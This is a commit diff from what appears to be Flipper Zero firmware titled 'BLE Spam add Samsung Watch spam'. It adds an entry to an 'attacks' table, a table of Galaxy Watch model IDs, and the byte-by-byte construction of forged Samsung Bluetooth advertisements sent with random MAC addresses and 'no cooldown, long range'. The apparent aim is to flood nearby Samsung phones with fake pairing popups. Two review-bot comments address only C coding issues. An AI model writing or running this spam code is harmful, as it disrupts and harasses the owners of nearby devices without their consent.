BLE Spam add Samsung Watch spam

Willy-JL
2023-10-21 03:54:59 +01:00
parent 857b881554
commit 4a97cb40b8
4 changed files with 227 additions and 2 deletions


@@ -88,7 +88,7 @@ static Attack attacks[] = {
}, },
}, },
{ {
.title = "Samsung Buds Pair", .title = "Samsung Buds Popup",
.text = "No cooldown, long range", .text = "No cooldown, long range",
.protocol = &protocol_smartthings, .protocol = &protocol_smartthings,
.payload = .payload =
@@ -96,7 +96,28 @@ static Attack attacks[] = {
.random_mac = true, .random_mac = true,
.cfg = .cfg =
{ {
.smartthings = {}, .smartthings =
{
.type = SmartthingsTypeBuds,
.data = {},
},
},
},
},
{
.title = "Samsung Watch Pair",
.text = "No cooldown, long range",
.protocol = &protocol_smartthings,
.payload =
{
.random_mac = true,
.cfg =
{
.smartthings =
{
.type = SmartthingsTypeWatch,
.data = {},
},
}, },
}, },
}, },


@@ -21,8 +21,42 @@ const struct {
}; };
const uint8_t buds_models_count = COUNT_OF(buds_models); const uint8_t buds_models_count = COUNT_OF(buds_models);
const struct {
uint8_t value;
const char* name;
} watch_models[] = {
{0x01, "White Watch4 Classic 44"},
{0x02, "Black Watch4 Classic 40"},
{0x03, "White Watch4 Classic 40"},
{0x04, "Black Watch4 44mm"},
{0x05, "Silver Watch4 44mm"},
{0x06, "Green Watch4 44mm"},
{0x07, "Black Watch4 40mm"},
{0x08, "White Watch4 40mm"},
{0x09, "Gold Watch4 40mm"},
{0x0a, "French Watch4"},
{0x0b, "French Watch4 Classic"},
{0x0c, "Fox Watch5 44mm"},
{0x11, "Black Watch5 44mm"},
{0x12, "Sapphire Watch5 44mm"},
{0x13, "Purpleish Watch5 40mm"},
{0x14, "Gold Watch5 40mm"},
{0x15, "Black Watch5 Pro 45mm"},
{0x16, "Gray Watch5 Pro 45mm"},
{0x17, "White Watch5 44mm"},
{0x18, "White & Black Watch5"},
{0x1b, "Black Watch6 Pink 40mm"},
{0x1c, "Gold Watch6 Gold 40mm"},
{0x1d, "Silver Watch6 Cyan 44mm"},
{0x1e, "Black Watch6 Classic 43mm"},
{0x20, "Green Goofy"},
{0x1a, "Fallback Watch"},
};
const uint8_t watch_models_count = COUNT_OF(watch_models);
static const char* type_names[SmartthingsTypeMAX] = { static const char* type_names[SmartthingsTypeMAX] = {
[SmartthingsTypeBuds] = "SmartThings Buds", [SmartthingsTypeBuds] = "SmartThings Buds",
[SmartthingsTypeWatch] = "SmartThings Watch",
}; };
static const char* smartthings_get_name(const ProtocolCfg* _cfg) { static const char* smartthings_get_name(const ProtocolCfg* _cfg) {
const SmartthingsCfg* cfg = &_cfg->smartthings; const SmartthingsCfg* cfg = &_cfg->smartthings;
@@ -31,6 +65,7 @@ static const char* smartthings_get_name(const ProtocolCfg* _cfg) {
static uint8_t packet_sizes[SmartthingsTypeMAX] = { static uint8_t packet_sizes[SmartthingsTypeMAX] = {
[SmartthingsTypeBuds] = 31, [SmartthingsTypeBuds] = 31,
[SmartthingsTypeWatch] = 15,
}; };
void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const ProtocolCfg* _cfg) { void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const ProtocolCfg* _cfg) {
const SmartthingsCfg* cfg = _cfg ? &_cfg->smartthings : NULL; const SmartthingsCfg* cfg = _cfg ? &_cfg->smartthings : NULL;
@@ -90,6 +125,31 @@ void smartthings_make_packet(uint8_t* out_size, uint8_t** out_packet, const Prot
// Truncated AD segment, Android seems to fill in the rest with zeros // Truncated AD segment, Android seems to fill in the rest with zeros
break; break;
} }
case SmartthingsTypeWatch: {
uint8_t model;
if(cfg && cfg->data.watch.model != 0x00) {
model = cfg->data.watch.model;
} else {
model = watch_models[rand() % watch_models_count].value;
}
packet[i++] = 14; // Size
packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
packet[i++] = 0x00; // ...
packet[i++] = 0x01;
packet[i++] = 0x00;
packet[i++] = 0x02;
packet[i++] = 0x00;
packet[i++] = 0x01;
packet[i++] = 0x01;
packet[i++] = 0xFF;
packet[i++] = 0x00;
packet[i++] = 0x00;
packet[i++] = 0x43;
packet[i++] = (model >> 0x00) & 0xFF;
break;
}
default: default:
break; break;
} }
@@ -102,6 +162,10 @@ enum {
_ConfigBudsExtraStart = ConfigExtraStart, _ConfigBudsExtraStart = ConfigExtraStart,
ConfigBudsModel, ConfigBudsModel,
}; };
enum {
_ConfigWatchExtraStart = ConfigExtraStart,
ConfigWatchModel,
};
static void config_callback(void* _ctx, uint32_t index) { static void config_callback(void* _ctx, uint32_t index) {
Ctx* ctx = _ctx; Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
@@ -117,6 +181,16 @@ static void config_callback(void* _ctx, uint32_t index) {
} }
break; break;
} }
case SmartthingsTypeWatch: {
switch(index) {
case ConfigWatchModel:
scene_manager_next_scene(ctx->scene_manager, SceneSmartthingsWatchModel);
break;
default:
break;
}
break;
}
default: default:
break; break;
} }
@@ -133,6 +207,18 @@ static void buds_model_changed(VariableItem* item) {
variable_item_set_current_value_text(item, "Random"); variable_item_set_current_value_text(item, "Random");
} }
} }
static void watch_model_changed(VariableItem* item) {
SmartthingsCfg* cfg = variable_item_get_context(item);
uint8_t index = variable_item_get_current_value_index(item);
if(index) {
index--;
cfg->data.watch.model = watch_models[index].value;
variable_item_set_current_value_text(item, watch_models[index].name);
} else {
cfg->data.watch.model = 0x00;
variable_item_set_current_value_text(item, "Random");
}
}
static void smartthings_extra_config(Ctx* ctx) { static void smartthings_extra_config(Ctx* ctx) {
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings; SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
VariableItemList* list = ctx->variable_item_list; VariableItemList* list = ctx->variable_item_list;
@@ -166,6 +252,32 @@ static void smartthings_extra_config(Ctx* ctx) {
variable_item_set_current_value_text(item, model_name); variable_item_set_current_value_text(item, model_name);
break; break;
} }
case SmartthingsTypeWatch: {
item = variable_item_list_add(
list, "Model", watch_models_count + 1, watch_model_changed, cfg);
const char* model_name = NULL;
char model_name_buf[3];
if(cfg->data.watch.model == 0x00) {
model_name = "Random";
value_index = 0;
} else {
for(uint8_t i = 0; i < watch_models_count; i++) {
if(cfg->data.watch.model == watch_models[i].value) {
model_name = watch_models[i].name;
value_index = i + 1;
break;
}
}
if(!model_name) {
snprintf(model_name_buf, sizeof(model_name_buf), "%02X", cfg->data.watch.model);
model_name = model_name_buf;
value_index = watch_models_count + 1;
}
}
variable_item_set_current_value_index(item, value_index);
variable_item_set_current_value_text(item, model_name);
break;
}
default: default:
break; break;
} }
@@ -268,3 +380,89 @@ void scene_smartthings_buds_model_custom_on_exit(void* _ctx) {
cfg->data.buds.model = cfg->data.buds.model =
(ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00); (ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00);
} }
static void watch_model_callback(void* _ctx, uint32_t index) {
Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
switch(index) {
case 0:
cfg->data.watch.model = 0x00;
scene_manager_previous_scene(ctx->scene_manager);
break;
case watch_models_count + 1:
scene_manager_next_scene(ctx->scene_manager, SceneSmartthingsWatchModelCustom);
break;
default:
cfg->data.watch.model = watch_models[index - 1].value;
scene_manager_previous_scene(ctx->scene_manager);
break;
}
}
void scene_smartthings_watch_model_on_enter(void* _ctx) {
Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
Submenu* submenu = ctx->submenu;
uint32_t selected = 0;
bool found = false;
submenu_reset(submenu);
submenu_add_item(submenu, "Random", 0, watch_model_callback, ctx);
if(cfg->data.watch.model == 0x00) {
found = true;
selected = 0;
}
for(uint8_t i = 0; i < watch_models_count; i++) {
submenu_add_item(submenu, watch_models[i].name, i + 1, watch_model_callback, ctx);
if(!found && cfg->data.watch.model == watch_models[i].value) {
found = true;
selected = i + 1;
}
}
submenu_add_item(submenu, "Custom", watch_models_count + 1, watch_model_callback, ctx);
if(!found) {
found = true;
selected = watch_models_count + 1;
}
submenu_set_selected_item(submenu, selected);
view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
}
bool scene_smartthings_watch_model_on_event(void* _ctx, SceneManagerEvent event) {
UNUSED(_ctx);
UNUSED(event);
return false;
}
void scene_smartthings_watch_model_on_exit(void* _ctx) {
UNUSED(_ctx);
}
static void watch_model_custom_callback(void* _ctx) {
Ctx* ctx = _ctx;
scene_manager_previous_scene(ctx->scene_manager);
scene_manager_previous_scene(ctx->scene_manager);
}
void scene_smartthings_watch_model_custom_on_enter(void* _ctx) {
Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
ByteInput* byte_input = ctx->byte_input;
byte_input_set_header_text(byte_input, "Enter custom Model");
ctx->byte_store[0] = (cfg->data.watch.model >> 0x00) & 0xFF;
byte_input_set_result_callback(
byte_input, watch_model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 1);
view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
}
bool scene_smartthings_watch_model_custom_on_event(void* _ctx, SceneManagerEvent event) {
UNUSED(_ctx);
UNUSED(event);
return false;
}
void scene_smartthings_watch_model_custom_on_exit(void* _ctx) {
Ctx* ctx = _ctx;
SmartthingsCfg* cfg = &ctx->attack->payload.cfg.smartthings;
cfg->data.watch.model = (ctx->byte_store[0] << 0x00);
}
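Review bot: The label `case watch_models_count + 1:` in `watch_model_callback` is not an integer constant expression in ISO C, because `watch_models_count` is declared as a `const uint8_t` object rather than an enum constant or macro, so it builds only where the compiler folds the value as an extension. Deriving the label from the array keeps it a true constant, e.g. `case COUNT_OF(watch_models) + 1:`, assuming `COUNT_OF` expands to a `sizeof` expression (its definition is not shown here). The `default:` branch of the same switch indexes `watch_models[index - 1]` without a bounds check, relying on the submenu only delivering the ids registered in `scene_smartthings_watch_model_on_enter`; a guard such as `if(index > watch_models_count) break;` would make that assumption explicit.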


@@ -6,6 +6,7 @@
typedef enum { typedef enum {
SmartthingsTypeBuds, SmartthingsTypeBuds,
SmartthingsTypeWatch,
SmartthingsTypeMAX, SmartthingsTypeMAX,
} SmartthingsType; } SmartthingsType;
@@ -15,6 +16,9 @@ typedef struct {
struct { struct {
uint32_t model; uint32_t model;
} buds; } buds;
struct {
uint8_t model;
} watch;
} data; } data;
} SmartthingsCfg; } SmartthingsCfg;
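Review bot: The new `uint8_t model;` field in the `watch` struct carries an undocumented sentinel value. The packet builder and the config UI added in this commit both treat `0x00` as "choose a random entry", so a custom byte of `0x00` stored by `scene_smartthings_watch_model_custom_on_exit` cannot be told apart from Random. A comment on the field, for example `// 0x00 = random entry from watch_models, otherwise the model byte`, would record that contract for the next maintainer. The enclosing `SmartthingsCfg` typedef starts outside the hunk.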


@@ -1,2 +1,4 @@
ADD_SCENE(smartthings_buds_model, SmartthingsBudsModel) ADD_SCENE(smartthings_buds_model, SmartthingsBudsModel)
ADD_SCENE(smartthings_buds_model_custom, SmartthingsBudsModelCustom) ADD_SCENE(smartthings_buds_model_custom, SmartthingsBudsModelCustom)
ADD_SCENE(smartthings_watch_model, SmartthingsWatchModel)
ADD_SCENE(smartthings_watch_model_custom, SmartthingsWatchModelCustom)